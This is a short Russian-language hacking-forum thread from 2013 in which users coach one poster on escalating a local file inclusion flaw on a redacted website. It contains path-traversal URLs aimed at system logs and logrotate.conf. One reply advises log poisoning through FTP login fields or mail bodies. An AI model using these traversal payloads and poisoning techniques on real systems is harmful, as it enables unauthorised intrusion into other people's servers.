ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   Помощь в раскрутке LFI (https://forum.antichat.io/showthread.php?t=390176)

vikler 28.07.2013 13:55

...........

qaz 28.07.2013 14:03

ищи лог файл

vikler 28.07.2013 14:06

..............

qaz 28.07.2013 14:10

Цитата:

Сообщение от vikler
вот, что удалось найти, но всё не то, да?
Код:

http://XXXXXXXXXX/ShowPage?vuln=../../../Tomcat-name/webapps/name/logs/20130727.log
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.1
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.0
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.2
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.3
http://XXXXXXXXXX/ShowPage?vuln=../../../etc/logrotate.conf


посмотри, пишутся ли в те логи ошибки

VY_CMa 28.07.2013 14:41

Поищи логи FTP, почту, в случае с FTP иногда ведется логирование логина, пароля при неудачном входе. Если так, то подставляй вместо логина от FTP свой ядовитый код и производи инклуд. В случае с почтой подобным образом, но дело с телом сообщения.

OxoTnik 28.07.2013 15:03

Вот тебе пути к логам wiki.apache.org/httpd/DistrosDefaultLayout

найдёшь пиши

BigBear 28.07.2013 16:22

Это оказалась читалка файлов, а не LFI.

Кроме просмотра конфигов - дело труба.


Время: 16:23